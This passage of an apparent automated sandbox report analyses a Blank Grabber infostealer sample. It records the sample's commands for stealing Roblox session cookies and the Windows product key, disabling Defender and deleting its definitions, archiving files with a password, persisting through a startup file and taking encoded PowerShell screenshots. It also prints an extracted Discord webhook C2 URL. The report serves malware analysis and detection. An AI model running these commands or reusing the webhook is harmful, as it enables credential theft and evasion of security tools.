        • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 2840 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 8052 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7700 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 7768 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 4340 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 1420 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 3020 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7916 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4940 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 2308 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7276 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 4444 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7228 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7444 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 2564 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7000 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7092 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7500 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 7412 cmdline: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 7420 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2208 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 1420 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 1704 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3940 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2648 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3244 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8100 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 1196 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7256 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8148 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4940 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 7620 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI32202\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000001.00000003.1702090319.000001AE1D338000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 19 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\phost.exe", ParentImage: C:\Users\user\Desktop\phost.exe, ParentProcessId: 3444, ParentProcessName: phost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'", ProcessId: 1136, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\phost.exe", ParentImage: C:\Users\user\Desktop\phost.exe, ParentProcessId: 3444, ParentProcessName: phost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 5544, ProcessName: cmd.exe
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\phost.exe", ParentImage: C:\Users\user\Desktop\phost.exe, ParentProcessId: 3444, ParentProcessName: phost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *", ProcessId: 7500, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\phost.exe, ProcessId: 3444, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAA